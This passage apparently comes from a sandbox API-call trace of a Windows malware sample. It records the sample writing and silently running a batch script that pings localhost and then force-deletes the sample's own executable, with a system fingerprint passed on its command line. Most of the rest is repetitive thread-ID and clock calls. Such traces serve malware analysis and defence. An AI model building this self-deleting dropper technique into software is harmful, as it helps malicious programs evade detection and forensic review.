lpUsedDefaultChar=0x0) returned 32 [0109.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1405124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0109.041] GetCurrentThreadId () returned 0xcc4 [0109.041] GetCurrentThreadId () returned 0xcc4 [0109.041] GetCurrentThreadId () returned 0xcc4 [0109.041] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13fde48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0109.041] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13fde48, cbMultiByte=83, lpWideCharStr=0x139012c, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0109.042] GetTickCount () returned 0x2618f [0109.042] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=16583076492) returned 1 [0109.042] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="G畔﮴\x12\x1c翻") returned 1 [0109.042] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="y畔﮴\x12\x1c翻") returned 1 [0109.042] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="2畔﮴\x12\x1c翻") returned 1 [0109.042] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="d畔﮴\x12\x1c翻") returned 1 [0109.042] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="w畔﮴\x12\x1c翻") returned 1 [0109.042] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="m畔﮴\x12\x1c翻") returned 1 [0109.042] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="V畔﮴\x12\x1c翻") returned 1 [0109.042] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="F畔﮴\x12\x1c翻") returned 1 [0109.042] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0109.042] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0109.042] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe", lpszShortPath=0x139c65c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe") returned 0x30 [0109.042] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0109.042] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0109.042] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\gy2dwmvf.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0109.043] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0109.043] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0109.043] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x137fbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\n", lpUsedDefaultChar=0x0) returned 145 [0109.043] WriteFile (in: hFile=0xe8, lpBuffer=0x137fbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x137fbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 1 [0109.044] CloseHandle (hObject=0xe8) returned 1 [0109.046] GetCurrentThreadId () returned 0xcc4 [0109.046] GetCurrentThreadId () returned 0xcc4 [0109.046] GetCurrentThreadId () returned 0xcc4 [0109.046] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xec, hThread=0xe8, dwProcessId=0xcec, dwThreadId=0xcf0)) returned 1 [0109.049] CloseHandle (hObject=0xec) returned 1 [0109.049] CloseHandle (hObject=0xe8) returned 1 [0109.049] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0109.049] GetCurrentThreadId () returned 0xcc4 [0109.049] GetCurrentThreadId () returned 0xcc4 [0109.049] GetCurrentThreadId () returned 0xcc4 [0109.049] GetCurrentThreadId () returned 0xcc4 [0109.049] GetCurrentThreadId () returned 0xcc4 [0109.049] GetCurrentThreadId () returned 0xcc4 [0109.049] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] WSACleanup () returned 0 [0109.217] FreeLibrary (hLibModule=0x77380000) returned 1 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentProcess () returned 0xffffffff [0109.217] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0109.217] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] ResetEvent (hEvent=0x88) returned 1 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] ResetEvent (hEvent=0x88) returned 1 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] CloseHandle (hObject=0x88) returned 1 [0109.217] CloseHandle (hObject=0x8c) returned 1 [0109.217] CloseHandle (hObject=0x84) returned 1 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.217] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.217] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.217] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.217] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.217] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] VirtualFree (lpAddress=0x12f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0109.220] FreeLibrary (hLibModule=0x76910000) returned 1 [0109.220] LocalFree (hMem=0x2f4478) returned 0x0 [0109.220] FreeLibrary (hLibModule=0x76910000) returned 1 [0109.220] LocalFree (hMem=0x2f4468) returned 0x0 [0109.220] ExitProcess (uExitCode=0x0) Thread: id = 56 os_tid = 0xcd4 [0108.890] WideCharToMultiByte (in: CodePage=0x4e4, 